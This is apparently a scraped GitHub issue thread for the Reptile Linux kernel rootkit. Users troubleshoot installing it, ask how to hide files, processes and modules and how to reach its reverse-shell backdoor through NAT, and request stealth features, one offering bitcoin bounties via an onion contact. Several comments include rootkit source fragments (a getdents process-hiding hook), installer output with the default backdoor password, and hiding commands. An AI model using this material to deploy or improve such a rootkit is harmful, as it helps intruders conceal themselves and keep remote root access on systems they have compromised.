f0rb1dd3n / reptile
LKM Linux rootkit
I tested on CentOS that the driver module doesn't load when the system reboots.
reptile-client> set PORT TCP=1
[-] wrong parameter!
How to set PORT?
Hi, I'm a gay ... :)
So, when I launch ./installer.sh remove I get this:
Uninstalling... rmmod: ERROR: Module rep_mod is in use
Other info:
On 4.15.0-kali3-amd64
lsmod | grep rep_mod
rep_mod 20480 1
/sbin/modinfo reptile
filename: /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
description: Reptile - A linux LKM rootkit
author: F0rb1dd3n - [email protected]
license: GPL
depends:
retpoline: Y
name: rep_mod
vermagic: 4.15.0-kali3-amd64 SMP mod_unload modversions
rmmod /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
rmmod: ERROR: Module reptile is not currently loaded
How to uninstall, please?
Line 208 in 2f13aac
use copy_to_user/copy_from_user, not __-versions
Line 233 in 2f13aac
Hi, did you want to add my blog post to your list of references?
https://www.google.com.au/search?q="unsigned+int+magic_packet_hook"
Thanks.
Hey, great work! thank you!
But how to unhide content inside tags after it's been inserted?
lsrootkit detects Reptile with a simple GID bruteforcing.
After executing apt-get install linux-headers-$(uname -r), it shows
Reading package lists... Done
Building dependency tree
Reading state information... Done
linux-headers-4.4.0-116-generic is already the newest version (4.4.0-116.140).
0 upgraded, 0 newly installed, 0 to remove and 158 not upgraded.
Then I execute ./installer.sh install, and it shows
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
writen by: F0rb1dd3n
Compiling... DONE!
Copying binaries to /reptile... DONE!
Installing... insmod: ERROR: could not insert module /reptile/reptile.ko: Invalid module format
ERROR!
Additional information about the system:
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
Linus un-exported vfs_read, preventing use on 4.14+
I would love to see these features implemented soon:
Hide CPU usage for specified processes : bounty 0.2btc
Hide iptables rules via netfilter hooks - bounty 0.1btc
Execute command at specified time directly via module (not using third party apps like cron) - bounty 0.1btc
Let me know if you are willing to work on this and I will forward my onion contact info.
Hi,
Thanks for the beta version. I tried to compile it on Ubuntu 18.04.1 (64 bit) but I got the following error:
: In function 'runshell':
:118:2: warning: ignoring return value of 'chdir', declared with attribute warn_unused_result [-Wunused-result]
/tmp/ccsXzAOl.o: In function `runshell': :(.text+0x267): undefined reference to `openpty'
collect2: error: ld returned 1 exit status
Makefile:12: recipe for target 'reverse' failed
make[1]: *** [reverse] Error 1
make[1]: Leaving directory '/home/test/Reptile/sbin'
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2
I have an application which processes I can hide with reptile. But it also loads a module which can be found with lsmod and likely other commands. Is there some way to hide the module with reptile?
rt
The TCP and UDP knocking in heaven's door is not working for a CentOS 6 box. Only ICMP knocking works. Could you check what the issue might be? Sebd rootkit raw sockets work for CentOS 6.
Hey there, the r00t.c code can be shortened without losing functionality - not sure if that's your style, but I opened a pull request in #5
Also I found some typos and fixed them. By the way, really neat tool you wrote there 👍
Line 200 in 2f13aac
Line 281 in 2f13aac
I like the feature of the previous version where you only needed to set ip and lport. Inputting everything in a single run seems complicated.
Hello,
I was testing the new remote backdoor (it's very nice) when I encountered this kernel crash (it happens quite quickly after using the remote backdoor). I was using Ubuntu 16.04.4 server (on VirtualBox) for testing. A similar crash also happened on Ubuntu 18.04 server.
Details: crash.txt
Line 120 in 2f13aac
Hi, any idea how to fix this problem?
root@test2:/opt/Reptile # ./setup.sh install
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... clear
Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666):
Would you like to config reverse shell each X time? (y/n) (default: n):
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
TAGs to hide file contents:
#
content to be hidden
#
Configuring... DONE!
Compiling... mkdir -p bin
cd sbin && make reverse cmd
make[1]: Entering directory '/opt/Reptile/sbin'
make[1]: 'reverse' is up to date.
make[1]: 'cmd' is up to date.
make[1]: Leaving directory '/opt/Reptile/sbin'
make -C /lib/modules/4.11.5-200.fc25.x86_64/build M=$PWD
make[1]: *** /lib/modules/4.11.5-200.fc25.x86_64/build: No such file or directory. Stop.
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2
ERROR!
root@test2:/opt/Reptile # yum install kernel-devel
Redirecting to '/usr/bin/dnf install kernel-devel' (see 'man yum2dnf')
Last metadata expiration check: 2:48:28 ago on Thu Dec 6 15:20:15 2018.
Package kernel-devel-4.13.16-100.fc25.x86_64 is already installed, skipping.
Dependencies resolved.
Nothing to do.
Complete!
root@test2:/opt/Reptile # ls -al /lib/modules/4.11.5-200.fc25.x86_64/
total 14380
drwxr-xr-x. 5 root root 4096 Jun 20 2017 .
drwxr-xr-x. 5 root root 4096 Dec 6 18:04 ..
lrwxrwxrwx. 1 root root 39 Jun 14 2017 build -> /usr/src/kernels/4.11.5-200.fc25.x86_64
-rw-r--r--. 1 root root 185270 Jun 14 2017 config
drwxr-xr-x. 13 root root 4096 Jun 20 2017 kernel
-rw-r--r--. 1 root root 974994 Jun 20 2017 modules.alias
-rw-r--r--. 1 root root 955399 Jun 20 2017 modules.alias.bin
-rw-r--r--. 1 root root 1804 Jun 14 2017 modules.block
-rw-r--r--. 1 root root 7554 Jun 14 2017 modules.builtin
-rw-r--r--. 1 root root 9974 Jun 20 2017 modules.builtin.bin
-rw-r--r--. 1 root root 334323 Jun 20 2017 modules.dep
-rw-r--r--. 1 root root 472573 Jun 20 2017 modules.dep.bin
-rw-r--r--. 1 root root 331 Jun 20 2017 modules.devname
-rw-r--r--. 1 root root 153 Jun 14 2017 modules.drm
-rw-r--r--. 1 root root 110 Jun 14 2017 modules.modesetting
-rw-r--r--. 1 root root 2701 Jun 14 2017 modules.networking
-rw-r--r--. 1 root root 126788 Jun 14 2017 modules.order
-rw-r--r--. 1 root root 486 Jun 20 2017 modules.softdep
-rw-r--r--. 1 root root 403343 Jun 20 2017 modules.symbols
-rw-r--r--. 1 root root 493901 Jun 20 2017 modules.symbols.bin
lrwxrwxrwx. 1 root root 5 Jun 14 2017 source -> build
-rw-------. 1 root root 3550927 Jun 14 2017 System.map
drwxr-xr-x. 2 root root 4096 Jun 14 2017 updates
drwxr-xr-x. 2 root root 4096 Jun 20 2017 vdso
-rwxr-xr-x. 1 root root 7137256 Jun 14 2017 vmlinuz
-rw-r--r--. 1 root root 167 Jun 14 2017 .vmlinuz.hmac
root@test2:/opt/Reptile # uname -a
Linux test2 4.11.5-200.fc25.x86_64 #1 SMP Wed Jun 14 17:17:29 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
root@test2:/opt/Reptile # cat /proc/version
Linux version 4.11.5-200.fc25.x86_64 ([email protected]) (gcc version 6.3.1 20161221 (Red Hat 6.3.1-1) (GCC) ) #1 SMP Wed Jun 14 17:17:29 UTC 2017
root@test2:/opt/Reptile # cat /etc/fedora-release
Fedora release 25 (Twenty Five)
Thanks for your nice work!
I still can't understand how to use the Hiding Files Function.
In readme:
Hide/unhide files contents: kill -51 0 and all content between the tags will be hidden
#
content to hide
#
What I did (using all default settings):
[root@TEST ~]# cd Reptile
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# # /root/Reptile/README.md #
[root@TEST Reptile]# kill -51 0
[root@TEST Reptile]# kill -51 0 # /root/Reptile/README.md #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# #
[root@TEST Reptile]# /root/Reptile/README.md
-bash: /root/Reptile/README.md: Permission denied
[root@TEST Reptile]# #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]#
I just don't know how to hide the file /root/Reptile/README.md.
# make
mkdir -p bin
cd sbin && make all
make[1]: Entering directory '/home/user/Desktop/Projects/Reptile/sbin'
gcc -O -W -Wall -o client pel.c aes.c sha1.c client.c
client.c: In function ‘p_error’:
client.c:48:4: warning: ‘strncat’ specified bound 7 equals source length [-Wstringop-overflow=]
strncat(error_message, " Error ", 7);
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
gcc -O -W -Wall -o shell pel.c aes.c sha1.c shell.c -lutil -DLINUX
gcc -Wall r00t.c -o r00t
strip client shell r00t
cp client shell r00t ../bin
make[1]: Leaving directory '/home/user/Desktop/Projects/Reptile/sbin'
make EXTRA_CFLAGS="-Dx86_64" -C /lib/modules/4.17.0-1-ARCH/build M=/home/user/Desktop/Projects/Reptile modules
make[1]: Entering directory '/usr/lib/modules/4.17.0-1-ARCH/build'
CC [M] /home/user/Desktop/Projects/Reptile/rep_mod.o
/home/user/Desktop/Projects/Reptile/rep_mod.c: In function ‘generic_find_sys_call_table’:
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: error: ‘sys_close’ undeclared (first use in this function); did you mean ‘ksys_close’?
if (syscall_table[__NR_close] == (unsigned long)sys_close)
^~~~~~~~~
ksys_close
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: note: each undeclared identifier is reported only once for each function it appears in
make[2]: *** [scripts/Makefile.build:319: /home/user/Desktop/Projects/Reptile/rep_mod.o] Error 1
make[1]: *** [Makefile:1572: _module_/home/user/Desktop/Projects/Reptile] Error 2
make[1]: Leaving directory '/usr/lib/modules/4.17.0-1-ARCH/build'
make: *** [Makefile:7: all] Error 2
Also, from my testing, syscall hooking no longer works in 4.17 so finding a way around that will be fun. Tested the same basic directory hiding code that worked on 4.16.13 on 4.17 and it no longer works.
I use CentOS 7 to compile the rootkit but I get this error:
Configuring... Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
DONE!
Compiling... ERROR!
Line 174 in 2f13aac
Line 187 in c56224a
Line 317 in 2f13aac
use _dt[sizeof(TOKEN)] while declaring
This is a great design, I want to learn it. Can you tell me how to use it on CentOS 7? Thank you! My kernel is CentOS 7 3.10.0-693.el7.x86_64. What should I do?
uname -a
Linux root 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
Compiling Error
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... clear
Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to port-knocking (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port to port-knocking (default: 666):
TCP port to port-knocking (default: 80):
UPD port to port-knocking (default: 53):
Hide name: reptile
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
TCP port: 80
UDP port: 53
TAGs to hide file contents:
#
content to be hidden
#
Configuring... DONE!
Compiling... ERROR!
data = (char *)((unsigned char *)icmp_header + sizeof(struct icmphdr));
data = (char *)((unsigned char *)tcp_header + sizeof(struct tcphdr));
data = (char *)((unsigned char *)udp_header + sizeof(struct udphdr));
skb_header_pointer() must be used along with a local on-stack copy of the skb->data portion...
See the example:
https://elixir.bootlin.com/linux/latest/source/net/bridge/netfilter/ebt_ip.c#L36
Hi,
I'm trying to add a hardcoded predefined hidden process name. I'm trying this but it doesn't work:
#include <linux/string.h>
static const char* phpn = "process";
In both getdents and getdents64:
while(off < ret) {
    dir = (void *)kdir + off;
    if((!p && (memcmp(HIDE, dir->d_name, strlen(HIDE)) == 0))
       || (p && is_invisible(simple_strtoul(dir->d_name, NULL, 10))))
       /* Predefined process check */
       || (p && (strncmp(dir->d_name, phpn, strlen(phpn)) == 0))
    {
        if(dir == kdir) {
            ret -= dir->d_reclen;
            memmove(dir, (void *)dir + dir->d_reclen, ret);
            continue;
        }
        prev->d_reclen += dir->d_reclen;
    } else {
        prev = dir;
    }
    off += dir->d_reclen;
}
if(copy_to_user(dirent, kdir, ret))
kfree(kdir);
return ret;
}
I was going to add a signal switch next, to enable and disable the hiding of the predefined process(es).
Tested on CentOS 6 x64 (using all the default settings).
Reptile may have a chance to crash RHEL 6 using all the default settings; sorry, I forgot to log the error code.
Good luck!
[test@test ~]$ lsof -i -n -P
lsof: WARNING: unsupported format: /proc/net/tcp
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
systemd-n 448 systemd-network 19u IPv4 15693 0t0 UDP 192.168.1.112:68
systemd-r 460 systemd-resolve 12u IPv4 16107 0t0 UDP 127.0.0.53:53
sshd 540 root 4u IPv6 17935 0t0 TCP *:22 (LISTEN)
Tested on Ubuntu 18.04.1 and Debian 9.
Hi,
Could you add another feature to this rootkit so that it can hide its packets from tools like wireshark/tcpdump?
Hello,
Hiding from these commands would be a nice feature.
Add a reverse-root-shell (each X time) - with certificate - using a DGA and/or IP/DOMAIN.
Hello, I'm not sure if I'm supposed to install the rootkit on both the client and the server, or whether this is something that you catch over netcat.
Watching some projects, I found this. It would be interesting and helpful to be able to add a "poison runlevel" utility for persistence.
Line 460 in c56224a
I get a crash after unloading the module; it looks like memory corruption:
"BUG: unable to handle kernel paging request at ffffffffc06e69bb"
It has something to do with the file content hiding feature; it doesn't crash after commenting out all related functions.
This is on CentOS 7 3.10.0-693.5.2.el7.x86_64.
Hi, thank you for this great project! As I read in another topic, it works only in an internal network, but I really need to use it with my VPS. How can I set it up to work through NAT? Does anyone have experience with that? There is no problem with the listener, but the server can't connect to me.
P.S. ./reverse works fine. Probably something with the magic packet, maybe I used it wrong? I run a web server on my VPS; is it possible to send a packet to Apache and trigger the reverse connection?
Line 135 in 2f13aac
rcu_read_lock()
for_each_process() { ... }
rcu_read_unlock()
Or:
read_lock(&tasklist_lock)
for_each_process() { ... }
read_unlock(&tasklist_lock)
Also, get_task_struct() is required for returning tasks.
See get_pid_task
void shell_execer(struct work_struct *work) {
    struct shell_task *task = (struct shell_task *)work;
    char *argv[] = { task->path, "-t", task->ip, "-p", task->port, NULL };
    exec(argv);
    if(task) {
        bzero(task->path, strlen(task->path)); <<-- task->path leak
        bzero(task->ip, strlen(task->ip)); <<-- task->{ip,port} leak
        bzero(task->port, strlen(task->port));
        kfree(task);
    }
}
You have a nice project, and judging by the stars it has, you should be very proud.
However, I propose the complete removal of this line from setup.sh. It's very offensive and adds no value to your project. Don't you agree?
(You're being silly there, buddy, for no reason.)
So, to install on this CentOS you just need to run ./setup.sh install. But before that you will have to install the String::Unescape perl module.
To do that, normally it is just this command or even cpan -i String::Unescape. But if you are having problems with that, you will have to check your perl. Maybe in some configurations perl is not fully installed.
Try to install (or even reinstall) perl and cpan on your system: yum install perl-devel cpan
It is also recommended: yum update
Originally posted by @f0rb1dd3n in #54 (comment)
Line 159 in c56224a